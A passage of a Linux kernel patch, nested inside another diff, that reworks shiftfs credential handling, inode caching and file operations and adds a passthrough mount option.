++	  If you don't know what Access Control Lists are, say N.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f7cada126daa..ad1ae5bce6c1 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,3 +1,4 @@
++#include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
+ #include <linux/file.h>
+@@ -7,83 +8,179 @@
+ #include <linux/kernel.h>
+ #include <linux/magic.h>
+ #include <linux/parser.h>
++#include <linux/security.h>
+ #include <linux/seq_file.h>
+ #include <linux/statfs.h>
+ #include <linux/slab.h>
+ #include <linux/user_namespace.h>
+ #include <linux/uidgid.h>
+ #include <linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/uio.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+ 	struct user_namespace *userns;
++	/* creds of process who created the super block */
++	const struct cred *creator_cred;
+ 	bool mark;
++	unsigned int passthrough;
++	struct shiftfs_super_info *info_mark;
+ };
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry);
++struct shiftfs_file_info {
++	struct path realpath;
++	struct file *realfile;
++};
++
++struct kmem_cache *shiftfs_file_info_cache;
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry);
++
++#define SHIFTFS_PASSTHROUGH_NONE 0
++#define SHIFTFS_PASSTHROUGH_STAT 1
++#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++
++static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	return true;
++}
+ 
+ enum {
+ 	OPT_MARK,
++	OPT_PASSTHROUGH,
+ 	OPT_LAST,
+ };
+ 
+ /* global filesystem options */
+ static const match_table_t tokens = {
+ 	{ OPT_MARK, "mark" },
++	{ OPT_PASSTHROUGH, "passthrough=%u" },
+ 	{ OPT_LAST, NULL }
+ };
+ 
+-static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++static const struct cred *shiftfs_override_creds(const struct super_block *sb)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct cred *cred = prepare_creds();
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 
+-	if (!cred)
+-		return NULL;
++	return override_creds(sbinfo->creator_cred);
++}
++
++static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
++					       struct cred *newcred)
++{
++	revert_creds(oldcred);
++	put_cred(newcred);
++}
++
++static int shiftfs_override_object_creds(const struct super_block *sb,
++					 const struct cred **oldcred,
++					 struct cred **newcred,
++					 struct dentry *dentry, umode_t mode,
++					 bool hardlink)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	if (!hardlink) {
++		int err = security_dentry_create_files_as(dentry, mode,
++							  &dentry->d_name,
++							  *oldcred, *newcred);
++		if (err) {
++			shiftfs_revert_object_creds(*oldcred, *newcred);
++			return err;
++		}
++	}
+ 
+-	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
+-	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
+-	put_user_ns(cred->user_ns);
+-	cred->user_ns = get_user_ns(ssi->userns);
++	put_cred(override_creds(*newcred));
++	return 0;
++}
+ 
+-	return cred;
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
+ }
+ 
+-static const struct cred *shiftfs_new_creds(const struct cred **newcred,
+-					    struct super_block *sb)
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
+ {
+-	const struct cred *cred = shiftfs_get_up_creds(sb);
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
+ 
+-	*newcred = cred;
++static void shiftfs_copyattr(struct inode *from, struct inode *to)
++{
++	struct user_namespace *from_ns = from->i_sb->s_user_ns;
++	struct user_namespace *to_ns = to->i_sb->s_user_ns;
++
++	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
++	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
++	to->i_mode = from->i_mode;
++	to->i_atime = from->i_atime;
++	to->i_mtime = from->i_mtime;
++	to->i_ctime = from->i_ctime;
++	i_size_write(to, i_size_read(from));
++}
+ 
+-	if (cred)
+-		cred = override_creds(cred);
+-	else
+-		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
++static void shiftfs_copyflags(struct inode *from, struct inode *to)
++{
++	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
+ 
+-	return cred;
++	inode_set_flags(to, from->i_flags & mask, mask);
+ }
+ 
+-static void shiftfs_old_creds(const struct cred *oldcred,
+-			      const struct cred **newcred)
++static void shiftfs_file_accessed(struct file *file)
+ {
+-	if (!*newcred)
++	struct inode *upperi, *loweri;
++
++	if (file->f_flags & O_NOATIME)
+ 		return;
+ 
+-	revert_creds(oldcred);
+-	put_cred(*newcred);
++	upperi = file_inode(file);
++	loweri = upperi->i_private;
++
++	if (!loweri)
++		return;
++
++	upperi->i_mtime = loweri->i_mtime;
++	upperi->i_ctime = loweri->i_ctime;
++
++	touch_atime(&file->f_path);
+ }
+ 
+-static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
++				       char *options)
+ {
+ 	char *p;
+ 	substring_t args[MAX_OPT_ARGS];
+ 
+-	ssi->mark = false;
++	sbinfo->mark = false;
++	sbinfo->passthrough = 0;
+ 
+ 	while ((p = strsep(&options, ",")) != NULL) {
+-		int token;
++		int err, intarg, token;
+ 
+ 		if (!*p)
+ 			continue;
+@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
+ 		token = match_token(p, tokens, args);
+ 		switch (token) {
+ 		case OPT_MARK:
+-			ssi->mark = true;
++			sbinfo->mark = true;
++			break;
++		case OPT_PASSTHROUGH:
++			err = match_int(&args[0], &intarg);
++			if (err)
++				return err;
++
++			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
++				return -EINVAL;
++
++			sbinfo->passthrough = intarg;
+ 			break;
+ 		default:
+ 			return -EINVAL;
+ 		}
+ 	}
++
+ 	return 0;
+ }
+ 
+ static void shiftfs_d_release(struct dentry *dentry)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	dput(real);
++	if (lowerd)
++		dput(lowerd);
+ }
+ 
+ static struct dentry *shiftfs_d_real(struct dentry *dentry,
+ 				     const struct inode *inode)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (inode && d_inode(dentry) == inode)
++		return dentry;
+ 
+-	if (unlikely(real->d_flags & DCACHE_OP_REAL))
+-		return real->d_op->d_real(real, real->d_inode);
++	lowerd = d_real(lowerd, inode);
++	if (lowerd && (!inode || inode == d_inode(lowerd)))
++		return lowerd;
+ 
+-	return real;
++	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
++	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
++	return dentry;
+ }
+ 
+ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_is_negative(lowerd) != d_is_negative(dentry))
+ 		return 0;
+ 
+-	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
+ 
+-	return real->d_op->d_weak_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
++
++	return err;
+ }
+ 
+ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int ret;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_unhashed(lowerd) ||
++	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
+ 		return 0;
+ 
+-	/*
+-	 * inode state of underlying changed from positive to negative
+-	 * or vice versa; force a lookup to update our view
+-	 */
+-	if (d_is_negative(real) != d_is_negative(dentry))
+-		return 0;
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
+ 
+-	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
++		err = lowerd->d_op->d_revalidate(lowerd, flags);
+ 
+-	ret = real->d_op->d_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
+ 
+-	if (ret == 0 && !(flags & LOOKUP_RCU))
+-		d_invalidate(real);
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
+ 
+-	return ret;
++	return err;
+ }
+ 
+ static const struct dentry_operations shiftfs_dentry_ops = {
+-	.d_release	= shiftfs_d_release,
+-	.d_real		= shiftfs_d_real,
+-	.d_revalidate	= shiftfs_d_revalidate,
++	.d_release	   = shiftfs_d_release,
++	.d_real		   = shiftfs_d_real,
++	.d_revalidate	   = shiftfs_d_revalidate,
+ 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
+ };
+ 
+-static int shiftfs_readlink(struct dentry *dentry, char __user *data,
+-			    int flags)
+-{
+-	struct dentry *real = dentry->d_fsdata;
+-	const struct inode_operations *iop = real->d_inode->i_op;
+-
+-	if (iop->readlink)
+-		return iop->readlink(real, data, flags);
+-
+-	return -EINVAL;
+-}
+-
+ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 				    struct delayed_call *done)
+ {
+-	if (dentry) {
+-		struct dentry *real = dentry->d_fsdata;
+-		struct inode *reali = real->d_inode;
+-		const struct inode_operations *iop = reali->i_op;
+-		const char *res = ERR_PTR(-EPERM);
+-
+-		if (iop->get_link)
+-			res = iop->get_link(real, reali, done);
++	const char *p;
++	const struct cred *oldcred;
++	struct dentry *lowerd;
+ 
+-		return res;
+-	} else {
+-		/* RCU lookup not supported */
++	/* RCU lookup not supported */
++	if (!dentry)
+ 		return ERR_PTR(-ECHILD);
+-	}
++
++	lowerd = dentry->d_fsdata;
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	p = vfs_get_link(lowerd, done);
++	revert_creds(oldcred);
++
++	return p;
+ }
+ 
+ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int err = -EOPNOTSUPP;
+-	const struct cred *oldcred, *newcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_setxattr(lowerd, name, value, size, flags);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_setxattr(real, name, value, size, flags);
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(lowerd->d_inode, inode);
+ 
+ 	return err;
+ }
+@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, void *value, size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_getxattr(real, name, value, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_getxattr(lowerd, name, value, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 				 size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_listxattr(real, list, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_listxattr(lowerd, list, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_removexattr(lowerd, name);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_removexattr(real, name);
+-	shiftfs_old_creds(oldcred, &newcred);
++	/* update c/mtime */
++	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
+ 
+ 	return err;
+ }
+@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+-static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
++static int shiftfs_inode_test(struct inode *inode, void *data)
+ {
+-	struct inode *reali;
+-
+-	if (!dentry)
+-		return;
+-
+-	reali = dentry->d_inode;
+-
+-	if (!reali->i_op->get_link)
+-		inode->i_opflags |= IOP_NOFOLLOW;
++	return inode->i_private == data;
++}
+ 
+-	inode->i_mapping = reali->i_mapping;
+-	inode->i_private = dentry;
++static int shiftfs_inode_set(struct inode *inode, void *data)
++{
++	inode->i_private = data;
++	return 0;
+ }
+ 
+-static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
+-			       umode_t mode, const char *symlink,
+-			       struct dentry *hardlink, bool excl)
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++				 umode_t mode, const char *symlink,
++				 struct dentry *hardlink, bool excl)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-	bool op_ok = false;
++	const struct cred *oldcred;
++	struct cred *newcred;
++	void *loweri_iop_ptr = NULL;
++	umode_t modei = mode;
++	struct super_block *dir_sb = diri->i_sb;
++	struct dentry *lowerd_new = dentry->d_fsdata;
++	struct inode *inode = NULL, *loweri_dir = diri->i_private;
++	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
++	struct dentry *lowerd_link = NULL;
+ 
+ 	if (hardlink) {
+-		op_ok = iop->link;
++		loweri_iop_ptr = loweri_dir_iop->link;
+ 	} else {
+ 		switch (mode & S_IFMT) {
+ 		case S_IFDIR:
+-			op_ok = iop->mkdir;
++			loweri_iop_ptr = loweri_dir_iop->mkdir;
+ 			break;
+ 		case S_IFREG:
+-			op_ok = iop->create;
++			loweri_iop_ptr = loweri_dir_iop->create;
+ 			break;
+ 		case S_IFLNK:
+-			op_ok = iop->symlink;
++			loweri_iop_ptr = loweri_dir_iop->symlink;
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			loweri_iop_ptr = loweri_dir_iop->mknod;
++			break;
+ 		}
+ 	}
+-	if (!op_ok)
+-		return -EINVAL;
++	if (!loweri_iop_ptr) {
++		err = -EINVAL;
++		goto out_iput;
++	}
+ 
++	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
+-	if (!newi)
+-		return -ENOMEM;
++	if (!hardlink) {
++		inode = new_inode(dir_sb);
++		if (!inode) {
++			err = -ENOMEM;
++			goto out_iput;
++		}
++
++		/*
++		 * new_inode() will have added the new inode to the super
++		 * block's list of inodes. Further below we will call
++		 * inode_insert5(), which would perform the same operation
++		 * again, thereby corrupting the list. To avoid this, raise
++		 * I_CREATING in i_state, which causes inode_insert5() to skip this
++		 * step. I_CREATING will be cleared by d_instantiate_new()
++		 * below.
++		 */
++		spin_lock(&inode->i_lock);
++		inode->i_state |= I_CREATING;
++		spin_unlock(&inode->i_lock);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++		inode_init_owner(inode, diri, mode);
++		modei = inode->i_mode;
++	}
+ 
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
++	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
++					    dentry, modei, hardlink != NULL);
++	if (err)
++		goto out_iput;
+ 
+-	err = -EINVAL;		/* shut gcc up about uninit var */
+ 	if (hardlink) {
+-		struct dentry *realhardlink = hardlink->d_fsdata;
+-
+-		err = vfs_link(realhardlink, reali, new, NULL);
++		lowerd_link = hardlink->d_fsdata;
++		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
+ 	} else {
+-		switch (mode & S_IFMT) {
++		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(reali, new, mode);
++			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(reali, new, mode, excl);
++			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(reali, new, symlink);
++			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			break;
++		default:
++			err = -EINVAL;
++			break;
+ 		}
+ 	}
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_revert_object_creds(oldcred, newcred);
+ 
++	if (!err && WARN_ON(!lowerd_new->d_inode))
++		err = -EIO;
+ 	if (err)
+-		goto out_dput;
++		goto out_iput;
++
++	if (hardlink) {
++		inode = d_inode(hardlink);
++		ihold(inode);
++
++		/* copy up times from lower inode */
++		shiftfs_copyattr(d_inode(lowerd_link), inode);
++		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
++		d_instantiate(dentry, inode);
++	} else {
++		struct inode *inode_tmp;
++		struct inode *loweri_new = d_inode(lowerd_new);
++
++		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
++					  shiftfs_inode_test, shiftfs_inode_set,
++					  loweri_new);
++		if (unlikely(inode_tmp != inode)) {
++			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
++			iput(inode_tmp);
++			err = -EINVAL;
++			goto out_iput;
++		}
+ 
+-	shiftfs_fill_inode(newi, new);
++		ihold(loweri_new);
++		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
++				   0, lowerd_new);
++		d_instantiate_new(dentry, inode);
++	}
+ 
+-	d_instantiate(dentry, newi);
++	shiftfs_copyattr(loweri_dir, diri);
++	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
++		set_nlink(diri, loweri_dir->i_nlink);
+ 
+-	new = NULL;
+-	newi = NULL;
++	inode = NULL;
+ 
+- out_dput:
+-	dput(new);
+-	iput(newi);
+-	inode_unlock(reali);
++out_iput:
++	iput(inode);
++	inode_unlock(loweri_dir);
+ 
+ 	return err;
+ }
+@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++			 dev_t rdev)
++{
++	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
++		return -EPERM;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
+-
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	const struct cred *oldcred;
+ 
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(reali, new);
++		err = vfs_rmdir(loweri, lowerd);
+ 	else
+-		err = vfs_unlink(reali, new, NULL);
++		err = vfs_unlink(loweri, lowerd, NULL);
++	inode_unlock(loweri);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	shiftfs_copyattr(loweri, dir);
++	set_nlink(d_inode(dentry), loweri->i_nlink);
++	if (!err)
++		d_drop(dentry);
++
++	set_nlink(dir, loweri->i_nlink);
+ 
+ 	return err;
+ }
+@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+-	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
+-		*realold = old->d_fsdata,
+-		*realnew = new->d_fsdata, *trap;
+-	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
++		      *lowerd_dir_new = new->d_parent->d_fsdata,
++		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
++		      *trapd;
++	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
++		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	int err = -EINVAL;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	trap = lock_rename(rndd, rodd);
++	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+-	if (trap == realold || trap == realnew)
++	if (trapd == lowerd_old || trapd == lowerd_new)
+ 		goto out_unlock;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
+-
+-	err = vfs_rename(realolddir, realold, realnewdir,
+-			 realnew, NULL, flags);
++	oldcred = shiftfs_override_creds(old->d_sb);
++	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
++			 NULL, flags);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(loweri_dir_old, olddir);
++	shiftfs_copyattr(loweri_dir_new, newdir);
+ 
+- out_unlock:
+-	unlock_rename(rndd, rodd);
++out_unlock:
++	unlock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+ 	return err;
+ }
+@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 				     unsigned int flags)
+ {
+-	struct dentry *real = dir->i_private, *new;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock(reali);
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	struct dentry *new;
++	struct inode *newi;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_parent->d_fsdata;
++	struct inode *inode = NULL, *loweri = lowerd->d_inode;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+ 	if (IS_ERR(new))
+ 		return new;
+ 
+ 	dentry->d_fsdata = new;
+ 
+-	newi = NULL;
+-	if (!new->d_inode)
++	newi = new->d_inode;
++	if (!newi)
+ 		goto out;
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
+-	if (!newi) {
++	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
++			     shiftfs_inode_test, shiftfs_inode_set, newi);
++	if (!inode) {
+ 		dput(new);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
++	if (inode->i_state & I_NEW) {
++		/*
++		 * inode->i_private set by shiftfs_inode_set(), but we still
++		 * need to take a reference
++		 */
++		ihold(newi);
++		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
++		unlock_new_inode(inode);
++	}
+ 
+- out:
+-	return d_splice_alias(newi, dentry);
++out:
++	return d_splice_alias(inode, dentry);
+ }
+ 
+ static int shiftfs_permission(struct inode *inode, int mask)
+ {
+-	struct dentry *real = inode->i_private;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
+ 
+-	if (mask & MAY_NOT_BLOCK)
++	if (!loweri) {
++		WARN_ON(!(mask & MAY_NOT_BLOCK));
+ 		return -ECHILD;
++	}
+ 
+-	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
+-	if (iop->permission)
+-		err = iop->permission(reali, mask);
+-	else
+-		err = generic_permission(reali, mask);
+-	shiftfs_old_creds(oldcred, &newcred);
++	err = generic_permission(inode, mask);
++	if (err)
++		return err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = inode_permission(loweri, mask);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_fiemap(struct inode *inode,
++			  struct fiemap_extent_info *fieinfo, u64 start,
++			  u64 len)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri->i_op->fiemap)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
++		filemap_write_and_wait(loweri->i_mapping);
++	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++			   umode_t mode)
++{
++	int err;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
++
++	if (!loweri->i_op->tmpfile)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(dir->i_sb);
++	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
+ 	struct iattr newattr = *attr;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+ 
++	err = setattr_prepare(dentry, attr);
++	if (err)
++		return err;
++
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
